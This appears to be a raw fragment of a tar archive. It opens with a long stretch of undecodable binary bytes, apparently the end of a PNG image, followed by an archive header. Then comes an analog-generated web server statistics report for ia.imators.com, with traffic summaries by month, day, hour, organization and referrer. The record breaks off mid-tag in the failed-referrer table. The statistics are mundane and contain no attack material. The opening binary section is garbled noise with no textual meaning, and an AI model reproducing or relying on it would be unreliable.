X-X�E������t�u��Үmʝ�y�)&�%�m�d:��������%a�2nnA�?a��G��K�Z�*�r^��,CDR744��)��h��?�9���Y�Цy��vAj�Uu���j�-�X{̧��c,��|hR��V��r���2��bX��+E7���a51����T���(,�`*OKA1� �����ᄥ�`uG�a)~��!��v�%rB5���&�X2���pJ�N��������@`����l�2t$�߮U:3�l-��(_�d������`�&��Yo����F �N%�p�) X����g�3��F�C�e!r4`5#V�®Q�UXV� �`�%YS��!�,�Sk%G���:���*�}l���F��Q˾��u��Ua�/�yX�����g�b�UTR�R���L8P�k;ES������X}�?i�`�^R��"�v��GY@ ]/����@̍:��A�$����� s�R/�����Vg>��,���=L�4NA �7"�����e�����Vg>�'�`���UJ�q��" #!�,%>ۄ��X�����o=�|n ���u�&�|���`��`���R�J�YEG������K�P��Y4- J�,œ��\"���h������Ba�9�V��V +��G˪$�V;����냅WL ��1�z�ba��R�WC-cX��yJ�d؎;F���TV�6aya������g�b��6m�x ]*I2\�5|[��gQ7�$��ߏ4�Y��J`�^x��� �jV��V��ΚJ�� luX(���z���X����]����na5`a�@Z��z( k������ �� �_X1�SQXyi�7��~C���aqa�����i���M ��(�N�V���.�-cX�^X�ŝ0�V�I���\�S+�i�%0�#)V^�Ŗ�5 �֩�yiM��A�n�pٰa5aفn�'48|AX�A:����|�A��� wW0����L%22������z� +�4f��6̓���K9� ���,S�h��S�����fci�'9��m� +V�0O C��>!u����G���(��.< ��R7�+{I���k�:Յ��k*|��2�"�,isX~�M��PX���)As�X#!��j +�%�%�I�`�|��� w�\�����t_K��X#�*�� K��H��,�����V� 1�x��)C�g�B>��^:-�UP��4�S]X��,�.�D�]F�Y|�p=�d2����+#�3��>����6��Ea/�yVmX�l+��8�e�?XC!��:U�б��+�u`��V{�5�t�����U�v��7l�[VYX�UV4 ����(�Y�|�r�L��Uq�|X���.X����gI�w���kwژ�͆8�o�qN�nGY�CIX�U����YQN*���r�2��2�2&�� `��X�a��ϲ�pw���Rp�!�wָ��ߑbA`� ��ea��XUaa ���ASa��� �^�2]N��>� th�y+k0Cܱr�`�Ja�VY�A��,�$����mQ�{�\#=,,��7b�Z��b(��`=d���j�������%|+�r7��� ���0��x[g�a/o�p��B�2����$)�Y�ِf͘o*��1ъ乖�u�8a�U Vs~�c�j��·�^�� �:�[��X��oCt��5�C� ����j��T4ʓr���^f�d�- ��j��V�Ks5���uJ�U`u�C���Őúm����R�"a�����a�ɶ�Y��>���`�l��6z�%�F�;�u��*��VW>��o��&���*ΤO~θ�p�*��6,�Kb�,臓�&��N]^���pT hjG�A�$JwXL�u"���� ��~C���1XT5���)�P��� ��W�~��zX}�?���y������cI���`�V ��5�~�I��VXYRg+�j�`�di���TYa�y��� �/��� H��X�,���1�"�X�Lk������7���*� �Z��,���]%y��2,��b� �- ��Jk�3�*,�a��d�,�Y� V��YXCNp�a�I>$Z�~rjQX^X9V1�*�� U�6E�PA��)*���0���o8�m�U�TV��S�ط^*��J~6�^[��u�Y�IŰ�ɖ���Y},�:`=rV���Ea�����A��� �ڤ^8� �zHŰ~5����=ɖ�ukY/~����Y��J�g ��b�l�sz>k,-� ����r�,�傕��0r���YS` �*�Zi����"�,����XXC�x��(k���h>�kb>k\Y�v�ƈ�Jn��Y4�����P��3,�G��^d�Օ�"�͔h��E�Y9M�6�g��)-��hYw>���g%�*�g)�Ϫ��,�uZ�Փ�/dUX��BML[?+JQ���g?���~ӿ��K�3˰��Y"d�Z�g)�ga=ϘϺ�W?����)W�-X5��N�Un/��� l Xw?|����)/��<6<Ò__�gZq1d���Y�����r�����;˖���,-G�G\/�ݷ�gi}~��'����>9ZMq1Xv�o��i�,�FZ@�!���|V�df �/c�:KKZOO�j�b��8�7 ��=M���h�?4��|C\�=��7\֖���u�@�Iq`-�|�U�pX�����/�au��9y��U�i�D�K�z�g ��y����~���ʋ� �c~V��bem��]�~7~��he���1�f>�0�|�+���I+t ����g���n�Ϛ+H����J�j��˚��[�9?�ҊhE�Z��W ��<-&����-�!8"�@��:`XFZ�bZA\,�LZ -מ`M�,�V��W���e��i�'�b��AZQw�U�ՙ�"ŘFU~~V~�����3M_�1�����!����K�W�9X�|馳� ��3�T�?:o+|��ea?����z��M�V��U�i`��,l]b�%}�K- �� �J:���Z���Vn�fo)6>�*�~7;4�� �4�?��YqX]����Y�0� �cE�G?�A�:̄夥+�*�V��U�i����J��MUb�TX����#����e�g�fZ����G!��K�:��#&�,l Q>kp~��8,����ۊ����+�~H�_���a->?w�fZ�2�]9}/L�y[��0���f�TZ�V,��|����J�J*�����$,뇩�X"���&'?��J����5jK¢~ȤEh�֬���5|.ʲ�f�!HK3Z{ֲ��2G�Kb ���6��kYX��!wDO+�� �3��5gf�{��t[�9���,���K�u �`�^���$�H��l�t��[ր��� �5X+�ϢàV�0�yA`E�:���w��%�g��LLx ���ʮ�[�L�"�*&��� Z�\ZgZOa���Y��Yee�1�{nX�2��?ZQ��X��HZ�?�a-2?+1 �EW���J�dlD�y=���Ҧ$��������{�(K0X����F��5&�L�|�F~~V�����+�]!�=��UK+\���C�����K����_!�?�T��%<!�k!?�ه��|�7���Hg��7�W�NYXs��Ң��� zNu�}+o- �aVZ��ފ�f� � ��^�a-�_v#��`e��gX3�0�V�m���Ŭk��#�K� � K��cr��&���Ж�����6a)��'�c��ՋJ�o���1_2�֗ʵ���%��*�����k�iG,5���_ē�����[�$���;SbX_ʝ,K�)�$7����jM�b�2~��u�rK��0!��)c�n(!�.�%�z,&�� � _���[�k�m���ʍ*��Y'�ya�.I����갦.\��K�'��Ya�d�p;��,��oek�J��Vj ���갦.\Kkb�.m4ـ5�q�Ȗ-Z���]#X'�.k��䈑^�7M�&�I��N��a�+��fIJ�l�ֲ&�IQ��j+��N��Z֔�E��� K�eh/�:`MYAa}kuvk�#?l� ���1��"�f=�&8"�B���n$,<"����B���nr~�h]��Ö���LX��^z��x��+`���{�� k8l���D�ς��� k4l�u,��|(8�"�����h��'`]���z��͎oc��<q>(�` x�ݺg�L6����bVgb���a�{�MT���j���nQM�UwŻ���� �ήX�ō�lmS` 3/�y�������*c�aYo4v�~�]U�f��;�����^���5`�;` �k�Xv��ր��5`��aI���qu�gd�C�s��y���wB�-}�Zڼ*,\sO���zmX�P�j��.V�f�*���`��{i^�;���6�B�XO�fW��p��I�Ke�%��U��� �K<|wC�2��9����� �?�D�vt���c�6%J�K�@���lgY7<7� DJ���b���,���&,��HX�T�k9��&��U��4;� � ˽4 C} <��p�LY���7��ve���Xp3y�r>[Z �m3����\X�A �J�2B�eP��:�!-�r�c��2X.�l�yXY1fK�-~�[8�x/��6G�) ��N� �^`1r>�tC9*|���u���+豫���7�)|��S���w�ھ��~� ��5`�;` �k�Xv��ր��5`�;` �k�Xv�0K�e֛�}^��ݜaM}ʋ��{q��n&?b��� ���� IEND�B`� 12.html 0000644 00000160557 15114762025 0005675 0 ustar 00 <?xml version="1.0" encoding="ISO-8859-1"?> <?xml-stylesheet href="#internalStyle" type="text/css"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Web Server Statistics for ia.imators.com</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <meta name="robots" content="noindex,nofollow" /> <meta name="generator" content="analog 6.0/Unix" /> <style type="text/css" id="internalStyle"> h2 { background-color: #A0C0F0; width: 98%; padding: 3px 6px; } table { text-align: right; margin-left: 30px; background-color: #D0E0F0; border-collapse: collapse; } th { border-bottom: 1px solid #404050; border-right: 1px dotted #606070; border-top: none; border-left: none; padding: 0px 5px 1px 5px; font-weight: bold; background-color: #A0C0F0; } td { padding: 0px 5px 1px 5px; border-right: 1px dotted #606070; border-left: none; border-bottom: none; border-top:none; } td.x { font-family: monospace; white-space: pre; } .xl { text-align: left; border-right: none; } .xr { text-align: right; border-right: none; } .bar { text-align: left; border-right: none; } tr.sub {background-color: #C0C0FF; font-style: italic; } .repdesc { font-style: italic; } .repspan { font-style: italic; } .goto { font-size: small; } .gensumtitle { font-weight: bold; } .gototitle { font-weight: bold; } .runtimetitle { font-weight: bold; } img { border-style: none; } a:link { color: blue; text-decoration: none; } a:visited { color: purple; text-decoration: none; } a:link:hover { text-decoration: underline; } a:visited:hover { text-decoration: underline; } a:link:active { color: red; text-decoration: underline; } a:visited:active { color: red; text-decoration: underline; } </style> </head> <body> <div class="header"><h1><a name="Top" id="Top" href="http://www.analog.cx/"><img src="/images/analogo.png" alt="" /></a> Web Server Statistics for <a href="http://ia.imators.com/">ia.imators.com</a></h1> <p class="analysisspan">Program started on Fri, Dec 05 2025 at 12:09 PM. <br />Analyzed requests from Wed, May 15 2024 at 10:34 PM to Fri, Dec 05 2025 at 12:53 AM (568.10 days).</p> </div> <div class="gensum"><h2><a name="gensum" id="gensum">General Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | General Summary | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="lastseven">Figures in parentheses refer to the 7-day period ending Dec 05 2025 at 12:09 PM.</p> <p class="gensumlines"> <span class="gensumtitle">Successful requests:</span> 1,475 (5) <br /><span class="gensumtitle">Average successful requests per day:</span> 2 (0) <br /><span class="gensumtitle">Successful requests for pages:</span> 1,046 (5) <br /><span class="gensumtitle">Average successful requests for pages per day:</span> 1 (0) <br /><span class="gensumtitle">Failed requests:</span> 5,414 (28) <br /><span class="gensumtitle">Redirected requests:</span> 7 (0) <br /><span class="gensumtitle">Distinct files requested:</span> 89 (1,792) <br /><span class="gensumtitle">Distinct hosts served:</span> 762 (995) <br /><span class="gensumtitle">Data transferred:</span> 1.54 megabytes (1.83 kilobytes) <br /><span class="gensumtitle">Average data transferred per day:</span> 2.78 kilobytes (268 bytes) </p> </div><div class="month"><h2><a name="month" id="month">Monthly Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | Monthly Report | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 3 requests for pages or part thereof.</p> <table> <thead><tr><th class="x">month</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">May 2024</td><td class="R">162</td><td class="P">101</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Jun 2024</td><td class="R">69</td><td class="P">63</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Jul 2024</td><td class="R">141</td><td class="P">97</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Aug 2024</td><td class="R">45</td><td class="P">41</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Sep 2024</td><td class="R">148</td><td class="P">82</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">Oct 2024</td><td class="R">24</td><td class="P">20</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Nov 2024</td><td class="R">59</td><td class="P">31</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Dec 2024</td><td class="R">26</td><td class="P">18</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x"> </td><td class="R"> </td><td class="P"> </td><td class="bar"> </td></tr> <tr><td class="x">Jan 2025</td><td class="R">63</td><td class="P">43</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Feb 2025</td><td class="R">21</td><td class="P">18</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Mar 2025</td><td class="R">65</td><td class="P">53</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Apr 2025</td><td class="R">31</td><td class="P">21</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">May 2025</td><td class="R">79</td><td class="P">58</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">Jun 2025</td><td class="R">75</td><td class="P">43</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Jul 2025</td><td class="R">62</td><td class="P">55</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Aug 2025</td><td class="R">134</td><td class="P">106</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">Sep 2025</td><td class="R">133</td><td class="P">85</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Oct 2025</td><td class="R">79</td><td class="P">58</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">Nov 2025</td><td class="R">55</td><td class="P">49</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Dec 2025</td><td class="R">4</td><td class="P">4</td><td class="bar"><img src="/images/barb2.png" alt="++" /></td></tr> </tbody></table> <p class="busiesttime">Busiest month: Aug 2025 (106 requests for pages).</p> </div><div class="daysum"><h2><a name="daysum" id="daysum">Daily Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | Daily Summary | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 5 requests for pages or part thereof.</p> <table> <thead><tr><th class="x">day</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">Sun</td><td class="R">210</td><td class="P">165</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Mon</td><td class="R">165</td><td class="P">119</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /></td></tr> <tr><td class="x">Tue</td><td class="R">271</td><td class="P">181</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Wed</td><td class="R">168</td><td class="P">129</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Thu</td><td class="R">236</td><td class="P">143</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Fri</td><td class="R">200</td><td class="P">175</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Sat</td><td class="R">225</td><td class="P">134</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> </tbody></table> </div><div class="hoursum"><h2><a name="hoursum" id="hoursum">Hourly Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | Hourly Summary | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 3 requests for pages or part thereof.</p> <table> <thead><tr><th class="x">hour</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">39</td><td class="P">36</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x"> 1</td><td class="R">98</td><td class="P">56</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 2</td><td class="R">53</td><td class="P">30</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x"> 3</td><td class="R">140</td><td class="P">75</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 4</td><td class="R">44</td><td class="P">32</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 5</td><td class="R">52</td><td class="P">38</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 6</td><td class="R">57</td><td class="P">39</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 7</td><td class="R">52</td><td class="P">42</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x"> 8</td><td class="R">72</td><td class="P">59</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x"> 9</td><td class="R">44</td><td class="P">38</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">10</td><td class="R">50</td><td class="P">48</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++" /></td></tr> <tr><td class="x">11</td><td class="R">34</td><td class="P">34</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">12</td><td class="R">55</td><td class="P">44</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">13</td><td class="R">49</td><td class="P">47</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++" /></td></tr> <tr><td class="x">14</td><td class="R">47</td><td class="P">47</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++" /></td></tr> <tr><td class="x">15</td><td class="R">40</td><td class="P">30</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">16</td><td class="R">49</td><td class="P">37</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">17</td><td class="R">44</td><td class="P">28</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">18</td><td class="R">56</td><td class="P">47</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++" /></td></tr> <tr><td class="x">19</td><td class="R">37</td><td class="P">29</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">20</td><td class="R">28</td><td class="P">26</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">21</td><td class="R">33</td><td class="P">24</td><td class="bar"><img src="/images/barb8.png" alt="++++++++" /></td></tr> <tr><td class="x">22</td><td class="R">234</td><td class="P">109</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">23</td><td class="R">68</td><td class="P">51</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> </tbody></table> </div><div class="dom"><h2><a name="dom" id="dom">Domain Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | Domain Report | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="whatinc"> Listing domains, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">domain</th></tr></thead> <tbody><tr><td class="R">1475</td><td class="b">100%</td><td class="xl">[unresolved numerical addresses]</td></tr> </tbody></table> </div><div class="org"><h2><a name="org" id="org">Organization Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | Organization Report | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./org.png" alt="" /></p> <p class="whatinc"> Listing the top 20 organizations by the number of requests, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">organization</th></tr></thead> <tbody><tr><td class="R">107</td><td class="b"> 6.08%</td><td class="xl">34</td></tr> <tr><td class="R">86</td><td class="b"> 5.43%</td><td class="xl">205.169</td></tr> <tr><td class="R">68</td><td class="b"> 3.14%</td><td class="xl">104</td></tr> <tr><td class="R">64</td><td class="b"> 4.90%</td><td class="xl">198.235</td></tr> <tr><td class="R">62</td><td class="b">21.71%</td><td class="xl">20</td></tr> <tr><td class="R">54</td><td class="b"> 2.55%</td><td class="xl">47</td></tr> <tr><td class="R">52</td><td class="b"> 4.36%</td><td class="xl">205.210</td></tr> <tr><td class="R">47</td><td class="b"> 2.66%</td><td class="xl">3</td></tr> <tr><td class="R">47</td><td class="b"> 2.73%</td><td class="xl">35</td></tr> <tr><td class="R">42</td><td class="b"> 2.99%</td><td class="xl">45</td></tr> <tr><td class="R">41</td><td class="b"> 2.75%</td><td class="xl">54</td></tr> <tr><td class="R">32</td><td class="b"> 1.13%</td><td class="xl">167.94</td></tr> <tr><td class="R">30</td><td class="b"> 1.85%</td><td class="xl">123</td></tr> <tr><td class="R">23</td><td class="b"> 0.90%</td><td class="xl">18</td></tr> <tr><td class="R">21</td><td class="b"> 4.60%</td><td class="xl">106</td></tr> <tr><td class="R">19</td><td class="b"> 0.09%</td><td class="xl">194.87</td></tr> <tr><td class="R">18</td><td class="b"> 0.64%</td><td class="xl">199.45</td></tr> <tr><td class="R">15</td><td class="b"> 0.51%</td><td class="xl">206.168</td></tr> <tr><td class="R">15</td><td class="b"> 0.92%</td><td class="xl">27</td></tr> <tr><td class="R">15</td><td class="b"> 0.73%</td><td class="xl">44</td></tr> <tr><td class="R">617</td><td class="b">29.32%</td><td class="xl">[not listed: 148 organizations]</td></tr> </tbody></table> </div><div class="redirref"><h2><a name="redirref" id="redirref">Redirected Referrer Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | Redirected Referrer Report | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="whatinc"> Listing referring URLs, sorted by the number of redirected requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">URL</th></tr></thead> <tbody><tr><td class="R">1</td><td class="xl"><a href="http://www.ia.imators.com/cgi-bin">http://www.ia.imators.com/cgi-bin</a></td></tr> </tbody></table> </div><div class="failref"><h2><a name="failref" id="failref">Failed Referrer Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | Failed Referrer Report | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./failref.png" alt="" /></p> <p class="whatinc"> Listing referring URLs, sorted by the number of failed requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">URL</th></tr></thead> <tbody><tr><td class="R">126</td><td class="xl"><a href="https://www.google.com/">https://www.google.com/</a></td></tr> <tr><td class="R">88</td><td class="xl"><a href="http://www.ia.imators.com/">http://www.ia.imators.com/</a></td></tr> <tr><td class="R">38</td><td class="xl"><a href="http://ia.imators.com/">http://ia.imators.com/</a></td></tr> <tr><td class="R">20</td><td class="xl"><a href="https://www.ia.imators.com/">https://www.ia.imators.com/</a></td></tr> <tr><td class="R">7</td><td class="xl"><a 